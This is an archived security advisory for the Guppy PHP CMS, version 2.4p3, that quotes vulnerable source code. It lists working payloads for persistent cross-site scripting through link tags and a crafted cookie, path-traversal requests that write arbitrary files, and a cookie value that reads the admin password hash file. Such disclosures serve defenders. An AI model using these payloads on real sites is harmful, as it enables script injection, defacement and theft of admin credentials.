Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: guppyxss.txt

Guppy (PHP) Cross Site Scripting




Informations :
ררררררררררררר
Language : PHP
Bugged Version : 2.4p3 (and less ?)
Patched version : 2.4p4
Website : <http://www.freeguppy.org>
Problems :
- Permanent XSS
- Files Reading
- Files Writing

PHP Code/Location :
ררררררררררררררררררר

postguest.php :

--------------------------------------------------------------------------------------------------------------------
[...]
$ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/l\\ <file://\\[l\\]www.([^\\[]*)\\[/l\\>]", "<a 
href=\"<http://www.\\1\>" target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[l\\]www.([^\\[]*)\\[/L\\ <file://\\[l\\]www.([^\\[]*)\\[/L\\>]", "<a 
href=\"<http://www.\\1\>" target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/l\\ <file://\\[L\\]www.([^\\[]*)\\[/l\\>]", "<a 
href=\"<http://www.\\1\>" target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[L\\]www.([^\\[]*)\\[/L\\ <file://\\[L\\]www.([^\\[]*)\\[/L\\>]", "<a 
href=\"<http://www.\\1\>" target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/l\\]","<a <file://\\[l\\]([^\\[]*)\\[/l\\]> href=\"\\1\ <file://\\1\>" 
target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[l\\]([^\\[]*)\\[/L\\]","<a <file://\\[l\\]([^\\[]*)\\[/L\\]> href=\"\\1\ <file://\\1\>" 
target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/l\\]","<a <file://\\[L\\]([^\\[]*)\\[/l\\]> href=\"\\1\ <file://\\1\>" 
target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[L\\]([^\\[]*)\\[/L\\]","<a <file://\\[L\\]([^\\[]*)\\[/L\\]> href=\"\\1\ <file://\\1\>" 
target=_blank>\\1</a>",$ptxt);
$ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a <file://\\[l=([^\\[]*)\\]([^\\[]*)\\[/l\\]> 
href=\"\\1\ <file://\\1\>" target=_blank>\\2</a>",$ptxt);
$ptxt = eregi_replace("\\[l=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a <file://\\[l=([^\\[]*)\\]([^\\[]*)\\[/L\\]> 
href=\"\\1\ <file://\\1\>" target=_blank>\\2</a>",$ptxt);
$ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/l\\]","<a <file://\\[L=([^\\[]*)\\]([^\\[]*)\\[/l\\]> 
href=\"\\1\ <file://\\1\>" target=_blank>\\2</a>",$ptxt);
$ptxt = eregi_replace("\\[L=([^\\[]*)\\]([^\\[]*)\\[/L\\]","<a <file://\\[L=([^\\[]*)\\]([^\\[]*)\\[/L\\]> 
href=\"\\1\ <file://\\1\>" target=_blank>\\2</a>",$ptxt);
[...]
--------------------------------------------------------------------------------------------------------------------


inc/includes.inc, inc/includes_IIS.inc :

-------------------------------------------------------------------------------
[...]
$usercookie = "GuppYUser";
$userprefs = array();
if (!empty($HTTP_COOKIE_VARS[$usercookie])) {
$userprefs = explode("||",$HTTP_COOKIE_VARS[$usercookie]);
$userprefs[0] = strip_tags($userprefs[0]);
$userprefs[1] = strip_tags($userprefs[1]);
$userprefs[2] = strip_tags($userprefs[2]);
$userprefs[3] = strip_tags($userprefs[3]);
$userprefs[4] = strip_tags($userprefs[4]);
$userprefs[5] = strip_tags($userprefs[5]);
$userprefs[6] = strip_tags($userprefs[6],"<br>");
if (($userprefs[0] == $lang[0] || $userprefs[0] == $lang[1]) & 
empty($lng)) {
$lng = $userprefs[0];
}
}
[...]
-------------------------------------------------------------------------------


inc/functions.php :

--------------------------------------------------------------
[...]
function ReadDBFields($fic) {
global $connector;
$DataDB = Array();
if (FileDBExist($fic)) {
$DataDB = file($fic);
for ($i = 0; $i < count($DataDB); $i++) {
$Fields[$i] = explode($connector,trim($DataDB[$i]));
}
}
return $Fields;
}

function WriteDBFields($fic,$Fields) {
global $connector;
$fhandle = fopen($fic, "w");
$DataDB = "";
for ($i = 0; $i < count($Fields); $i++) {
for ($j = 0 ; $j < (count($Fields[$i])-1); $j++) {
$DataDB .= trim($Fields[$i][$j]).$connector;
}
$DataDB .= trim($Fields[$i][count($Fields[$i])-1])."\n";
}
fputs($fhandle, $DataDB);
fclose($fhandle);
}
[...]
--------------------------------------------------------------


tinymsg.php :

-----------------------------------------------------------------------------------------------------------------------------
[...]
elseif ($action == 2) {
[...]
$dbmsg[0][0] = 0;
$dbmsg[1][0] = $from;
$dbmsg[1][1] = GetCurrentDateTime();
$dbmsg[1][2] = PutBR(RemoveConnector(stripslashes($msg)));
WriteDBFields($userep.$to.$dbext,$dbmsg);
}
[...]
elseif ($action == 3) {
?>
[...]
$dbmsg = Array();
if (FileDBExist($userep.$userprefs[1].$dbext)) {
$dbmsg = ReadDBFields($userep.$userprefs[1].$dbext);
for ($i = 1; $i < count($dbmsg); $i++) {

?>
<p><? echo $web6; ?> <b><? echo $dbmsg[$i][0]; ?></b> <? echo $web7." 
".FormatDate($dbmsg[$i][1]); ?></p>
<p><? echo $dbmsg[$i][2]; ?></p>
<?
if ($dbmsg[$i][0] != $web214) {
?>
<p align="center">[ <A href ="javascript:PopupWindow('tinymsg.php?lng=<? 
echo $lng; ?>&action=1&to=<? echo $dbmsg[$i][0]; ?>&from=<? echo 
$userprefs[1]; ?>','tinywrite',330,245,'no','no')"><? echo $web140; ?></A> 
]</p>
<?
}
?>
<hr>
[...]
-----------------------------------------------------------------------------------------------------------------------------


Exploits :
רררררררר

- [l]" style="background:url('javascript:[SCRIPT]');visibility:hidden;[/l]

- [l][l] style=list-style:url(javascript:[SCRIPT]) truc=[/l][/l]


- With a cookie named "GuppYUser" and with the value :
fr||[NICK]||[MAIL]||LR||||on||<br 
style="background:url('javascript:[SCRIPT]')">, if you send a message 
(forum, guestbook,...) the javascript is executed.


- <http://[target]/tinymsg.php?action=2&from=Youpi!||Great> 
!||rose||10000&msg=1&to=../poll
will add a possibility to the current poll : "Youpi!" with the pink color 
("rose" in french) and a score of 10000.

- 
<http://[target]//tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2> 
will write into <http://[target]/tadaam.html> the line :
0\nyoupi1||[DATE+HEURE]||youpi2

- The cookie named "GuppYUser" and with the value :
fr||../../admin/mdp.php%00||[MAIL]||LR||||on||1
sent to the page : <http://[target]/tinymsg.php?action=3> will show the 
source of the file <http://[target]/admin/mdp.php> (containing the md5-crypted 
admin password).



Patch/More Details :
רררררררררררררררררר
<http://www.phpsecure.info>




frog-m@n <mailto:frog-m@n>

_________________________________________________________________
Hotmail: votre e-mail gratuit ! <http://www.fr.msn.be/hotmail>


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH